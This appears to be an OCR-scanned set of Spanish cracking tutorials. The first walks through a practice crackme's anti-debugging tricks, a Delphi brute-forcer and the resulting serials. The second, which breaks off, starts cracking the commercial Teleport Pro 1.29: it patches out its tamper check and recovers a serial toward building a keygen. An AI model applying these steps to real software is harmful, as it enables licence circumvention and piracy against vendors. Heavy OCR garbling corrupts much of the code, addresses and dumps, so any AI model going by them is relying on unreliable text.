004011F0 C3 retn ; Return Near from Procedure 


Lo primero significativo que vemos es que guarda el descriptor de la tabla de interrupciones, este descriptor son 6 bytes, los 
cuatro primeros que se guardan son la dirección base de la tabla de interrupciones y los otros 2 bytes son el límite de dicha tabla. 


¿Por qué se guarda en ESP-2? Para que la siguiente instrucción POP EDX recupere la dirección base de dicha tabla (el límite es 
descartado) 


Aquí teneis como queda la pila después de esta instrucción: 


EDI=815FE9C4 EBP=0063FF"78 ESP=0063FE14 EIP=004011CF od Is zapc 
cs=014F Ds=0157 Sss=0157 ES=0157 FS=30F7 GS=0000 


byte PROT (0) 
0157:0063FE04 FF FF FF FF 80 EF 5F 81-77 42 F7 BF 00 FA FF 02 ...... WBirs ss 
->0157:0063FE14 00 00 OA 80 C4 E9 5F 81-F4 3D 60 81 78 FF 63 00 ...... O E O 
0157:0063FE24 38 FE 63 00 00 00 00 00-CO ED 5F 81 AO 0A 62 81 8.C....... b 


ESP apunta a donde está guardada la dirección base de la tabla de registros: 800A0000 


Si miramos ahora esa zona de memoria, vemos lo siguiente: 


0157:800A0000 84 8A 28 00 00 8E 2F C9-94 8A 28 00 00 EE 2F C9 ..(.../...(.../. 
0157:800A0010 EA EC 28 00 00 8E 03 CO-AZ 8A 28 00 00 EE 2F C9 ..(....... (ai 
0157:800A0020 B4 8A 28 00 00 EE 2F C9-C4 8A 28 00 00 EE 2F C9 ..(.../...(.../. 


y 


Esta es la tabla de interrupciones. Su formato es: 


INTERRUPT DESCRIPTOR 


== GAMER. OR 
INTERRUPT *$N -- 


IDT REGISTER | | ] 


INTERRUPT $1 -- 
LS 0 


O IDT LIMIT ----- + | | | | 
Y | -- GATE FOR 
INTERRUPT $0 -- 
| IDT BASE —------=---- >| | | | 
HZ O + $ 
==-=-- + 
SL 0 


Cada entrada de la tabla tiene esta forma: 


80386 INTERRUPT GATE 
SL 23 15 Ñ 


OFFSET 31..16 pb. PDBLJO" dd: de 000: 0 
0; (NOT USED) ¡4 
A A a a a a a e a a a a a a a a a a a e a ii a ad ii $ —= => == a A A O A O O O O O O O O O A O O O O O O 


SELECTOR OFFSET 15..0 


Como se puede apreciar, cada entrada de la tabla ocupa 8 bytes que forman un descriptor para cada una de las interrupciones. El 
offset a la rutina de servicio de cada interrupción está dividido en dos mitades. Volviendo a nuestra tabla: 


0157:800A0000 84 8A 28 00 00 8E 2F C9-94 8A 28 00 00 EE 2F C9 ..(.../...(.../. 


Y aplicando lo anterior, vemos que el offset a la INT 1 es: c92F8A94. El código que resta de esta rutina lo que hace es cargar ese 
valor en EBX y guardarlo en la variable que se encuentra en 402099 

Después sustituye el offset a la INT 1 por la dirección 40130E (que por supuesto está dentro del crackme3) Es decir, a partir de 
ahora cada vez que se produzca una INT 1 se ejecutará su rutina de servicio que está en 40130E. Es debido a esto lo que os decía 
antes de que sí que hay una pequeña protección Anti-Traza que debemos saltar para poder seguir trazando. Una de las soluciones a 
esto puede ser: 


Cuando estemos en 4011E4 (antes de ejecutarla) cambios EIP a 4011EF con lo que no modificamos el valor que tenía el offset a 
INT 1. Y seguimos... 


A la vuelta de esta rutina, el programa presenta el DialogBox y no hace nada especial que no sea esperar a que algún "pardillo" 
intente meter un Serial correcto. 


Para saltarnos esto metemos un BPX GetDlgltemTextA, le damos a F5 para salir de SICE y metemos un Serial. Si analizais el 
código vereis que se esperan 16 caracteres (10h) en 401142, aunque sólo 12 de ellos (los 12 primeros) se usan luego. 


Al darle al botón Register actúa el BreakPoint y aparecemos en SICE. Le damos a F12 para volver de la API y estamos aquí: 


004011F1 60 pusha ; Push all General Registers 
004011F2 BF 6D 20 40 00 mov edi, offset word_40206D 


En EDI tenemos la dirección del Serial: 


0157:0040206D 54 48 45 4C 41 4D 45 52-4E 49 44 4F 00 00 00 00 THELAMERNIDO.... 
(Para los impacientes: Éste es bueno ;) 


Luego se calcula la longitud en EDI. 


004011F7 33 CO xor eax, eax ;¿ Logical Exclusive OR 

004011F9 AE scasb ; Compare String 

004011FA 75 FD jnz short loc_4011F9 ; Jump if Not Zero (ZF=0) 

004011FC 4F dec edi ; Decrement by 1 

004011FD 81 EF 6D 20 40 00 sub edi, offset word_40206D ; Integer Subtraction 
00401203 83 FF 0C cmp edi, OCh ; Compare Two Operands 

00401206 73 06 jnb short loc_40120E ; Jump if Not Below (CF=0) 


La longitud se compara con 12 (0Ch) y si es menor debería echarnos. Digo "debería" porque aquí se le coló un bug a N12 :) (que ya 
ha corregido) y la instrucción siguiente tendría que ser jmp 4012F5 y NO 3z 4012F5 porque de esta forma se cuelan los Serials de 
menos de 12 caracteres. 


00401208 OF 84 E7 00 00 00 3z loc_4012F5 ; Jump if Zero (ZF=1) 
0040120E loc_40120E: ; CODE XREF: sub_4011F1+15.]3 


Si el Serial pasa el test de longitud, se cogen los caracteres n*s 9,10,11 y 12 y se hace una serie de sencillas operaciones con ellos 
que no voy a explicar. El resultado estará en EAX. 


0040120E 81 2D 75 20 40 00+ sub dword_402075, 30303030h ; Integer Subtraction 

00401218 B8 54 26 54 41 mov eax, 41542654h ; 'AT8£T' Publicidad encubierta ;) 

0040121D 0F B7 1D 75 20 40+ movzx ebx, word ptr dword_402075 ; Move with Zero-Extend 
00401224 8B CB mov ecx, ebx 

00401226 C1 E3 10 shl ebx, 10h ; Shift Logical Left 

00401229 0B CB or ecx, ebx ;¿ Logical Inclusive OR 

0040122B 33 C1 xor eax, ecx ; Logical Exclusive OR 

0040122D OF B7 1D 77 20 40+ movzx ebx, word ptr dword_402075+2 ; Move with Zero-Extend 
00401234 8B CB mov ecx, ebx 

00401236 C1 E3 10 shl ebx, 10h ; Shift Logical Left 


00401239 0B CB or ecx, ebx ;¿ Logical Inclusive OR 
0040123B 03 Cl add eax, ecx ¡; Add 


Después de dichos cálculos, EAX debe valer 775E5ESEh para poder continuar. Éste es el primer test que debe pasar el serial 


(quitando el de la longitud). 


0040123D 3D 5E 5E 5E 77 cmp eax, 7TI75E5E5Eh ; Compare Two Operands 
00401242 0F 85 AD 00 00 00 j3jnz loc_4012F5 ; Jump if Not Zero (ZF=0) 


Para obtener estos cuatro caracteres nada mejor que un Fuerza Bruta. 
Yo lo hice en Delphi. 


var 
PNIZYOS<-"TpNiZzyas 
sigue:boolean; 


procedure TpNi2v3.GenerarClick (Sender: TObject); 
var 

bueno, Veax, palabra, palabro: Integer; 

Reax, Rebx,Recx, 1: Integer; 

palb: array[1..4] of byte; 

r_salir:boolean; 

F:TextFile; 

Nombre_F: String; 


begin 
Generar.Enabled:=false; 
Parar.Enabled:=true; 


Randomi ze; 
Nombre_F:=IntToStr (Trunc (Random(65535)))+'.txt'; (Las 
un fichero) 

AssignFile(F,Nombre_F); 


claves buenas las 


guardamos en 


1f FileExists(Nombre_F) 
Appena (F') 


else 


Rewrite(EF); 


bueno 


:=S775E5E5E; 


Veax:=$41542654; 
palabra:=$00000000; 
[1] :=palabra div $1000000; 


palb 


then 


palb[2]:=palabra div $10000; 
palb[3]:=palabra div $100; 
palb[4]:=palabra; 

palabro: 

sigue:=true; 

while (sigue) do 


begin 


(Empezamos con '0000') 


=palb[2]*51000000+palb[1]*510000+palb[4]1*$100+palb[3]; 


Label1.Caption:=chr ($30+palb[1])+chr ($30+palb[2])+chr ($30+palb[3])+chr ($30+palb[4]1); 
application.processmessages; 


Rebx: 
Rebx: 
Recx: 
Rebx: 
Recx: 
Reax: 
Rebx: 
Rebx: 
Rebx: 
Rebx: 


Recx 
Rebx 
Recx 
Reax 


=palabro; 

=Rebx div $10000; 
=Rebx; 
=Rebx*$10000; 
=Recx or Rebx; 
=(Veax xor Recx); 
=palabro; 

=Rebx div $10000; 
=Rebx*$10000; 
=palabro-Rebx; 
:=Rebx; 
:=Rebx*$10000; 
:=Recx or Rebx; 
:=Reax+Recx; 


(Cojo la 
ÍLa meto 
(Dejo la 


(Cojo la 


(Dejo la 


parte 
en la 
parte 


parte 


parte 


alta) 
parte baja de ecxj) 
alta en la parte alta de ebx) 


baja) 


alta en la parte alta de ebx) 


if Reax=bueno then (Si pasa el test guardamos la palabra) 
begin 


Lista.Items.Add (chr ($30+palb[2]) +chr ($30+palb[1])+chr ($30+palb[4])+chr ($30+palb[3])); 
Writeln(F,chr ($30+palb[2])+chr ($30+palb[1])+chr ($30+palb[4])+chr ($30+palb[3])); 


Flush (EF); 

end; 

i:=4; 
r_salir:=false; 
repeat 


if palb[i]=$2A then 
if i=1 then 
begin 
r_salir:=true; 
PararClick (Sender); 
end 
else 
begin 
palb[i]:=$00; 
dec (i); 
end 
else 
begin 
palb[il:=succ (palb[i]); 
r_salir:=true; 
end 
until (r_salir); 
palabro:=palb[1]*$1000000+palb[2]*$10000+palb[3]*$100+palb[41; (Repetimos hasta 
12222") 
end; 
end; 


Podeis comprobar que se chequean las cadenas desde '0000' hasta 'ZZZZ'. No miro las minúsculas porque el Serial no puede 
contenerlas. 


En muy poco tiempo el contenido del fichero es este: 


0A:W 1A9W 2A8W 3A7W 4A>W 5bA=W 6AAJ/W ?A3W (AJW AAIW BAHW CAGW 

DANW EAMW FALW GAKW HABW IAAW JAC(W KA?W LAFW MAEW NADW OACW 01:0 1190 2180 3170 41>0 5I=0 61 “7I;O 8120 
9110 :100 140 ?130 QIJO AIIO BIHO CIGO DINO EIMO FILO GIKO HIBO IIAO JIRO 

KI?0 LIFO MIEO NIDO OICO 


Uf! ¿son muchas no? Bueno sí, pero hay alguna que llama la atención: DINO, FILO, LIFO, NIDO 


Volviendo al código del crackme, si nos fijamos en la rutina que hay en 40130E (justo la nueva rutina de servicio de la INT 1) 


vemos esto: 


0040130E 
0040132B 
00401330 
00401335 
00401338 
0040133D 
0040133D 
0040133F 
00401342 
00401343 
00401345 
00401346 


Además de otras cosas, la rutina usa esos cuatro caracteres para desencriptar la zona de código que comentamos anteriormente y 


60 


BF 
B9 
cl 
Al 


pusha ; 


74 12 
78 00 
E9 02 
75 20 


loc_40133D: 


31 
83 
49 
75 
61 
CF 


07 xor 


dec ecx ; 


F8 3jnz short loc_40133D ; 
Pop all General Registers 
Interrupt Return 


popa ; 
iret ; 


que está en 401274. 


40 00 mov edi, 
00 00 mov ecx, 
shr ecx, 2 5; 
40 00 mov eax, 


[edi], 
C7 04 add edi, 4 ; 


CODE XREF': 
eax ; 
Add 

Decrement by 1 


Pues vamos a probar nuestras suposiciones: 


Nota: Para esta prueba se ha de tener en cuenta que lo primero que se ha hecho con esos cuatro bytes es restarles '0000' en 40120E. 


Push all General Registers 


offset byte_401274 

78h 

shift Logical Right 

dword_402075 
.text:00401343.3 

Logical Exclusive OR 


Jump if Not Zero 


(ZF=0) 


Cogemos una cadena, de las que creemos que pueden ser, al azar: 'NIDO' ;) 


La pasamos a hex: 4E 49 44 4F 
Le restamos 30303030: ie 19 14 1F 


Y con HexWorkShop hacemos un XOR con ese valor a la zona encriptada. Ante nuestros ojos podemos ver esto: 


NI2 CRACKME*+3 RESOLVED Ohhhhh, yeah. You know how a debugger and Windows work :) 


Creo que vamos bien... XDDDDD 


Si guardamos el exe modificado y lo desensamblamos con IDA vemos que la zona encriptada ya no lo está tanto: 


00401274 
00401275 
00401277 
00401278 
0040127D 
0040127E 
0040127F 
0040127F 
00401281 
00401298 
00401298 
004012D2 
004012D2 
004012D2 
004012D7 
004012D8 
004012DA 
004012DF 
004012E1 
004012E8 
004012E9 


nop 
push 0 
nop 

mov eax, 
nop 

push eax 


offset aNi2Crackme3Res 


jmp short loc_4012D2 


, 


"NI2 CRACKME+3 RESOLVED" 


, 


aNi2Crackme3Res db 
a0OhhhhhYeah_You db 
; DATA XREPF : 


sub_4011F1+El.o 


'NI2 CRACKMEF3 RESOLVED',0 ; 
'Ohhhhh, yeah. You know how a debugger and Windows work 


DATA XREF: sub_4011F1+87.0 


2) 0 


, 


loc_4012D2: ; 


CODE XREPF: 
offset aO0hhhhhYeah_You 


dword_402095 


pop large dword ptr fs:0 


mov eax, 
push eax 
push 0 
mov eax, 
call eax 
nop 

add esp, 


4 


, 


sub_4011F1+8E.]3 


"Ohhhhh, yeah. You know how a debugger a"... 


Está claro que el programa deberá llegar aquí para decirnos que hemos acertado con el Serial. 
Pero ¿cuando y cómo? 


Seguimos: 


Después de que nuestro Serial pase el primer test, viene esto: 


00401248 BE 47 13 40 00 mov esi, offset loc_401347 

0040124D 56 push esi 

0040124E OF B7 05 6D 20 40+ movzx eax, word_40206D ; Move with Zero-Extend 
00401255 35 35 18 00 00 xor eax, 1835h ; Logical Exclusive OR 

0040125A 2D 61 50 00 00 sub eax, 506l1lh ; Integer Subtraction 

0040125F 64 FF 30 push dword ptr fs: leax] 

00401262 64 89 20 mov fs: [eax], esp 


Una de las partes más interesantes del crackme (Chapó N12 :) 


Antes de ver lo que pasa aquí, os explico un poco de qué va la historia... El SEH !!!! 

El SEH (Structured Exception Handling) es la forma que tiene Windows de gestionar las excepciones que se puedan producir en un 
programa. Se trata de una estructura de datos que consiste en una o más rutinas de servicio que son interrogadas por Windows, 
cuando se produce una excepción, para ver quién se quiere encargar de gestionarla. Esta estructura es individual para cada Thread y 
se monta, normalmente, en la pila. FS:[0] apunta siempre a la cabeza de la lista de los manejadores de excepción y cada uno de ellos 
lleva un puntero al siguiente, menos el último cuyo puntero vale -1. 


Después de este rollo vamos a ver qué hace esta parte del código: 


Se guarda en la pila la dirección 401347. 

Luego se opera con los caracteres n'%s 1 y 2 de nuestro serial en EAX y se guarda el valor apuntado por FS:[EAX] en la pila. No es 
dificil ahora adivinar lo que debe valer EAX... CERO PATATERO ;) 

Lo que ha hecho es guardar la cabeza del SEH en la pila y a continuación carga en ES:[0] el valor de ESP 

Se consigue con esto mantener el SEH coherente y hemos añadido una rutina de manejo de excepciones a la lista :) 


Desde SICE se puede ver esta estructura: 


EDI=0000000C EBP=0063FB4C ESP=0063FB20 ElP=00401267 od ls ZabP c 
cs=014F DsS=0157 Sss=0157 ES=0157 FS=30F7 GS=0000 DS:00000000=9E 


byte PROT (0) 
30F7:00000000 20 FB 63 00 00 00 64 00-00 E0 63 00 06 2B 3F 24 .c...d...c..+?$ 
30F"7:00000010 30 52 00 80 00 00 00 00-D4 E9 5F 81 01 00 FF FF 0OR........_..... 
30F"7:00000020 00 00 00 00 DC AD 51 C9-27 27 00 00 5C EA 5F 81 ...... ON 


30E7:000900030' 74. 3D: 060::81: 22 22 22 2222 22 BRORLD IB RA VUE RA is ia 


Esta es la zona apuntada por FS:[0] y conocida como TIB (Thread Information Block) ¿Veis como el primer valor es 0063FB20? 
lo mismo que vale ESP en ese momento. 


Con la instrucción XFRAME de SOFTICE vemos el SEH antes: 


xFrame  XHandler xTable xScope 


0Ox63FF68 OxBFFB8CF8 OxBFFB8ED8 00 
try/except (0000) filter=0xBFF88E98, handler=0xBFF88EA1 


0Ox63FB88 OxBFF7192E 0x8B9E248F 00 
(scope table inaccessible) 


y después de añadir nuestro manejador: 


xFrame  XxHandler xTable xScope 


Ox63FF68 OXBFFB8CF8 OxBFFB8ED8 00 
try/except (0000) filter=0xBFF88E98, handler=0xBFF88EA1 


0x63FB88 OXBFF7192E 0x8B9E248F 00 
(scope table inaccessible) 


0Ox63FB20 0x401347 Ox63FB54 30130 
(scope table inaccessible) 


Recapitulemos: 
Tenemos la INT 1 desviada a nuestro código y tenemos un manejador de excepciones propio. 


Seguimos: 


00401265 33 CO xor eax, eax ;¿ Logical Exclusive OR 
00401267 C6 00 00 mov byte ptr [eax], O 

0040126A loc_40126A: ; CODE XREF: sub_4011F14+7F.3) 
0040126A EB 01 jmp short loc_40126D ; Jump 
0040126C 0F db OFh 

0040126D loc_40126D: ¿; CODE XREF: sub_4011F1+79.3 
0040126D EB 01 jmp short loc_401270 ; Jump 
0040126F 24 db 24h 

00401270 loc_401270: ¿; CODE XREF: sub_4011F1+7C.3 
00401270 EB F8 jmp short loc_40126A ; Jump 


Ponemos EAX a cero y en esa dirección escribimos un cero... pues qué bien. 
Luego en 40126A saltamos a 40126D que nos hace saltar a 401270 y que nos devuelve a 40126A ¿e...? 
Un bucle infinito ???? Noooo.... rebobinamos hasta: 


00401267 C6 00 00 mov byte ptr [eax], O 


Si EAX=0 estamos escribiendo en una zona de memoria QUE NO PERMITE LA ESCRITURA !!!! 
Consecuencia: ACCESS_FAULT !!! ¡Una excepción! ¡Qué casualidad! 
¿Quién se hará cargo de esa excepción? Pues CASUALMENTE nuestro manejador en 401347. 


Nota: Cuando ocurre una excepción Windows pasa al Ring-0 y allí ejecuta los manejadores de excepción 


Para pillarlo, antes de ejecutar el MOV [EAX],0 metemos un BreakPoint en 401347 y le damos a FS. 
¡Premio!, estamos en SOFTICE., 


Ahora prepararos para los malabarismos de Ni2: 


00401347 OF B7 05 6F 20 40+ movzx eax, word_40206F ; Move with Zero-Extend 
0040134E 35 D2 BA 00 00 xor eax, OBAD2h ; Logical Exclusive OR 

00401353 2D AB 25 00 00 sub eax, 25ABh ; Integer Subtraction 

00401358 35 E0 DO 00 00 xor eax, ODOEOh ; Logical Exclusive OR 

0040135D 8B 1C 04 mov ebx, [espt+eax] 


En EAX mete los caracteres 3 y 4 de nuestro serial, los marea un poco y obtiene un puntero a una zona de la pila en EBX. 


00401360 C7 43 10 74 12 40+ mov dword ptr [ebx+10h], offset 401274 


Luego usando ese puntero y sumándole un ofsset de 10h, mete 401274. 


00401367 OF B7 05 71 20 40+ movzx eax, word_402071 ; Move with Zero-Extend 
0040136E 2D 42 48 00 00 sub eax, 4842h ; Integer Subtraction 


Ahora coge los caracteres 5 y 6 del Serial y les resta 4842h 


00401373 89 43 18 mov [ebx+18h], eax 


Usando el puntero anterior y el ofsset 18h, mete el valor obtenido en EAX. 


00401376 C7 83 B8 00 00 00+ mov dword ptr [ebx+0B8h], offset 401274 


Y en el ofsset B8h vuelve a guardar 401274 


00401380 33 CO xor eax, eax ; Logical Exclusive OR 
00401382 C3 retn ; Return Near from Procedure 


Termina con EAX=0 y retorna. 
¿Y qué cojones ha hecho? 


Eso mismo me pregunté yo durante un tiempo... La solución: 


En un artículo estupendo de Matt Pietrek sacado del Microsoft Systems Journal (Enero 1997), Matt explica el mecanismo de las 
excepciones en Windows. Resulta, que cuando Windows detecta una excepción mira a ver si hay manejadores buscando en el TIB y 
si es así, mete en la pila cuatro punteros: 


ExceptionRecord 
EstablisherFrame 
ContextRecord 
DispatcherContext 


Si miramos la pila vemos esto: 


EDI=0063FA28 EBP=0063F978 ESP=0063F958 ElP=00401347 od ls ZabP c 
cs=014F DsS=0157 ss=0157 ES=0157 FS=30F7 GS=0000 DS:0040206F=4C45 


byte PROT (0) 
0157:0063F958 80 67 F7 BF 28 FA 63 00-20 FB 63 00 44 FA 63 00 .g..(.c. .c.D.c. 
0157:0063F968 00 FA 63 00 20 FB 63 00-8C 67 F7 BF 20 FB 63 00 ..C. .C..Q.. .C. 
0157:0063F978 10 FA 63 00 F3 58 F8 BF-28 FA 63 00 20 FB 63 00 ..C..X..(.C. .C. 
0157:0063F988 44 FA 63 00 00 FA 63 00-47 13 40 00 0C 00 00 00 D.c...c.G.t..... 


0157:0063F998 47 13 40 00 00 00 14 1F-7E 16 44 89 00 00 00 00 G.G..... a 
0157:0063F9A8 00 00 00 00 00 00 00 00-24 8A A8 9D EF 04 04 8A ........ e a E 
0157:0063F9B8 3F 24 00 01 54 89 3F 24-00 00 00 00 F4 08 4F 06 28..T.?8...... O. 
0157:0063F9C8 70 F4 4F 06 08 00 5A 8A-3F 24 4B 01 50 01 22 F4 p.0...Z.?$K.P.". 
0157:0063F9D8 FE 05 4F 06 00 00 FE 05-50 01 40 01 02 00 00 00 ..0O..... Pla 
0157:0063F9E8 4E 20 EC 0D 00 00 00 00-00 00 08 00 4E 01 46 01 N .......... N.F. 
0157:0063F9F8 00 00 00 00 F4 3D 60 81-00 00 00 00 00 00 00 00 ..... o ara 
0157:0063FA08 C4 E9 5F 81 00 00 00 00-4C FB 63 00 D7 BA EC EF .._..... Das ds 


0157:0063FA18 44 FA 63 00 28 FA 63 00-0D 00 00 00 00 00 00 00 D.C.(.C......... 


0157:0063FA28 05 00 00 CO 00 00 00 00-00 00 00 00 67 12 40 00 ............ g.f. 
0157:0063FA38 02 00 00 00 00 00 00 OO-EFF FF FF FF 1F 00 01 00 .....ooooooo.... 
0157:0063FA48 00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00 ..cccooccooooo.... 
0157:0063FA58 FO 4F FF FF 3F 04 00 00-7F 02 FF FF 00 00 FF FF .0..?...81277....... 
0157:0063FA68 FF FF FF FF 00 00 00 00-00 00 00 00 00 00 00 00 .....cooooooo.... 
0157:0063FA78 00 00 FF FF 00 00 00 00-00 00 00 00 00 00 00 00D ....cooooooo.... 
0157:0063FA88 00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00 ..ccoocooooo.... 
0157:0063FA98 00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00 ..cccooccooooo.... 
0157:0063FAAS8 00 00 00 00 00 00 00 38-33 33 33 33 33 D3 03 40 ....... 833333..4 


0157:0063FAB8 00 00 00 00 00 00 4E D1-0E 40 00 00 00 00 00 00 ...... Nica lud 
0157:0063FAC8 00 00 00 00 0A 00 00 00-00 00 00 00 E7 30 00 00 .....oooo.... 0.. 
0157:0063FAD8 57 01 00 00 57 01 00 00-0C 00 00 00 47 13 40 00 W...W....... G.f. 
0157:0063FAE8 00 00 14 1F 01 00 00 00-14 1F 14 1F 00 00 00 00 .....oooooooo.... 
0157:0063FAF8 4C FB 63 00 67 12 40 00-4F 01 00 00 46 02 00 00 L.c.g.t.O0...F... 
0157:0063FB08 20 FB 63 00 57 01 00 00-77 16 F6 BF 00 70 63 00 .c.W...w....pc. 
0157:0063FB18 5C 8B FB 3C 22 F4 A8 8B-88 FB 63 00 47 13 40 00 X..<"..... c.G.f. 
0157:0063FB28 54 FB 63 00 C4 8B 00 00-4C FB 63 00 48 FB 63 00 T.c..... L.c.H.c. 


La primera doble palabra es la dirección de retorno... Ni caso. 

La segunda es nuestro primer parámetro: Un puntero al ExceptionRecord 

La tercera el segundo parámetro: Un puntero al EstablisherFrame ¿Os suena la dirección? 
La cuarta el tercer parámetro: Un puntero al ContextRecord 


Éste es el que nos interesa. El Registro de Contexto almacena todos los registros del procesador cuando se produjo la excepción 
(estareis hartos de verlos en los mensajitos de Windows: "Este programa ha efectuado una operación no válida y bla, bla, bla...) 


Pues usando ese parámetro como puntero en EBX, a 10h bytes de distancia está el valor que tenía el DR3 (Debug Address Register) 
(en este caso: 00000000) y en él introduce 00401274. 

A 18h bytes está el valor del registro DR7 (Debug Control Register) y ahí mete el valor que calculó en EAX. Luego en el offset B8h 
está lo que tenía EIP: 00401267 (La dirección de la instrucción que causó la excepción) y lo sustituye por 00401274. 


¿Qué dices que ha hecho? 


Ha puesto un BreakPoint de Ejecución en el registro de depuración 3 (DR3) en la dirección 401274, la ha habilitado con el valor 
introducido en DR” y ha cambiado EIP para que continúe, a la vuelta de la excepción, en esa dirección: 401274. Cuando Windows 
devuelva el control al programa y se recupere su Contexto desde esta zona (se cargan los registros) se continuará la ejecución en la 
dirección a la que apunta ahora EIP: 401274. 


Pero, un momento, aún no hemos desencriptado esa zona !!!! 
Para eso está el BreakPoint, en cuanto se intente ejecutar la instrucción que hay en 401274 saltará el BP y se producirá una 
interrupción... casualmente, otra vez, la INT 1. 


S1 recordais la rutina de servicio estaba en 40130E: 


0040130E 60 pusha ; Push all General Registers 

0040130F OF B7 05 73 20 40+ movzx eax, word_402073 ; Move with Zero-Extend 
00401316 35 31 59 00 00 xor eax, 5931h ; Logical Exclusive OR 

0040131B 2D 74 04 00 00 sub eax, 474h ; Integer Subtraction 

00401320 BB 28 13 40 00 mov ebx, offset dword_401328 


00401328 OF 23 F8 mov dr7, eax 


«.. Esto ya lo conoceis 
00401346 CF iret ; Interrupt Return 


Ahora usa los caracteres 7 y 8 del Serial para calcular un valor en EAX que mete en DR7. ¿Para qué? 
Para deshabilitar la interrupción que habilitó antes... ya no la necesita :) 


Luego, como hemos visto, desencripta el código y al volver de la interrupción se encuentra con el código perfectamente ejecutable 
para mostrarnos el mensajito de CRACKME RESOLVED !!! 
Además, elimina el manejador de excepciones que introdujo, con la instrucción: POP FS:[0] 


Sólo queda por ver que cuando salimos del programa se ejecuta la rutina que está en 401383 y lo que hace es restaurar el valor 
previo de la rutina de servicio de la INT 1. 


conclusiones 


¿Cómo he resuelto cada parte del Serial? 


Caracteres 1 y 2: 
El resultado en EAX debía ser O luego en 40125A EAX debía valer: 5061h y por lo tanto 5061h XOR 1835h = HT (no confundir el órden: "TH') 


Caracteres 3 y 4: 
El desplazamiento hasta el puntero al ContextRecord es OCh, luego deshaciendo las operaciones entre 40134E y 401358 -'ElL' 


Caracteres 5 y 6: 

El valor que se debe introducir en DR7 debe habilitar el BreakPoint que hay en DR3, luego las soluciones son múltiples: 'Ax', 'xB', 'x2' (La x puede ser cualquier valor) 
Caracteres 7 y 8: 

Ahora el valor que se mete en DR7 ha de ser tal que el byte en la parte baja sea 00. También hay varias posibilidades: 'Ex' 

Caracteres 9, 10, 11 y 12: 

Fuerza Bruta. ='NIDO' 


Luego los serials válidos tienen la forma: THELAXExNIDOxxxx ó THELxBExNIDO ó THELx2ExXNIDO etc... 


Bueno, se acabó. Espero que hayais aprendido (los que no lo sabierais) lo mismo que yo con este crackme. HE DISFRUTADO !!! Saludos. Crick 


para saber mas 


INTEL 80386 PROGRAMMER'S REFERENCE MANUAL 1986 capítulos 9 y 12 
http://webster.cs.ucr.edu/Page_asm/Doc386/ o en la web de Intel. 


A Crash Course on the Depths of Win32 Structured Exception Handling, MSJ January 1997 
http://microsoft.com/msj/0197/exception/exception.htm 


. Todo el material aquí editado es para uso exclusivamente didáctico. 
¿Dudas? ¿Comentarios? ... (o Escríbeme Ñ e á ! 
Crick NO se responsabiliza del uso ilegal de este material. 


Karpoff Spanish Tutor: Pagina dedicada a la divulgacion de informacion en Castellano, sobre 
Ingenieria Inversa y Programacion. Email "Colabora con tus Proyectos" 


Karpoff Spanish Tutor 
Programa: Teleport Pro 1.29.1590 


PROTECCION: Name / Serial 
Objetivo: Hacer un Keygen (o dos) 


Parece que sirve para bajarse páginas web enteras, pero no sé si 


AOpen: va bien o no, porque aún lo estoy evaluando :0) 
Dificultad: Novato 

DOWNLOAD: http://www .tenmax.com/teleport/pro/download.htm 

Herramientas: Softice, W32dasm, Visual Basic y Win32ASM 

CRACKER: Caos reptante FECHA: 20/02/2001 


INTRODUCCION 


El creador de este programa se ha lucido, al menos en lo que a su protección se refiere. Como veremos más 
adelante, trata de impedir la modificación del programa (desde luego sin conseguirlo), y en cambio permite 
descubrir con toda facilidad el serial number correcto. La rutina de generación del número está rodeada de 
un código inútil que efectúa una serie de cálculos que se repiten varias veces y que no sirven para nada. Sin 
embargo, al llegar a la rutina (que ocupa unas pocas líneas de código), no hay problema para ver su 
funcionamiento. En fin, el objeto de este trabajo no es tanto el desproteger este programa, sino ver como se 
hace un keygen... o dos. :0) 


AL ATAKE 


Consideraciones previas... 


Empezaremos con el W32Dasm para ver con qué nos enfrentamos. Si miramos las String Data References, 
tendremos una muestra de la maldad humana: 


"Hello, New User! Your free evaluation period for this share" 
"Hello again! You're halfway through the free evaluation per" 
"Hello again! After this session, you will have only one mor" 
"Hello again! This session marks the end the free evaluation" 
La verdad es que este tío es un palizas. 


"We're sorry! The registration number you entered appears to" 
"We're terribly sorry, but this copy of Teleport Pro appears "” 
Me da la impresión de que hasta tienen lista negra de números pirateados. 


Por si tratamos de tocarle las tripitas al programa: 
"This program has been altered, possibly by a virus; program execution will stop now.' 
¡Llamarme virus a mí! ¡Te vas a enterar! 


, 


Pero al final triunfaremos: 
"Thank you! Your copy of Teleport Pro is now registered. Al" 


Como somos optimistas, buscamos esta última cadena y encontramos: 


:00426941 E896090000 call 004272DC 

:00426946 3945E8 cmp dword ptr [ebp-18], eax 
:00426949 59 pop ecx 

:0042694A 753A jne 00426986 

:0042694C A184E44700 mov eax, dword ptr [0047E484] 
:00426951 8945F0 mov dword ptr [ebp-10], eax 


* Possible Reference to String Resource ID=07026: "Thank you! Your copy of Teleport Pro is 
now registered. Al" 


:00426954 68721B0000 push 00001B72 


Aquí vemos inmediatamente que el meollo de la cuestión está en el ¡ne 00426986 que nos aleja del premio. 
Podríamos invertir el salto, pero sólo serviría para que el programa nos diga que estamos registrados, aún sin estarlo 
realmente. 


¿Qué cómo vamos a invertir el salto si el programa no se deja tocar? muy fácil: 


:0040B8CE A110C74700 mov eax, dword ptr [0047C710] 
:0040B8D3 3B30 cmp esi, dword ptr [eax] 

:0040B8D5 7413 je 0040B8EA 

:0040B8D7 53 push ebx 

:0040B8D8 53 push ebx 


* Possible StringData Ref from Data Obj ->"This program has been altered, " 
-=>"possibly by a virus; program execution " 

-=>"will stop now." 

:0040B8D9 6820C74700 push 0047C720 

:0040B8DE E847FF0300 call 0044B82A 


Sólo hay que invertir el salto en 40B8DS5. 


Pero dejémonos de perder el tiempo. Ejecutamos el Symbol Loader, cargamos el programa, y cuando aparece el 
Softlce, como ya sabemos donde queremos ir, tecleamos g 42694a. Cuando arranca el programa, vamos a 
registrarnos; introducimos nuestro nombre y un número mágico (Yo pongo: "Caos reptante" y "932345678". 
Aceptamos, salta el Softlce y aparecemos en el lugar del salto. Ahora se trata de ver que es lo que comparaba: 


:00426941 E896090000 call 004272DC 

:00426946 3945E8 cmp dword ptr [ebp-18], eax 
:00426949 59 pop ecx 

:0042694A 753A jne 00426986 


¿Qué hay en EAX? 66DECBA9 Bonito número :0) y ¿qué hay en EBP-18? tecleamos d ebp-18 (la dirección es 
70F468) y vemos que hay 4E779237 ¿y si...? vamos a ver: entramos ? 3792774e y ¡SÍ! 3792774E 932345678 
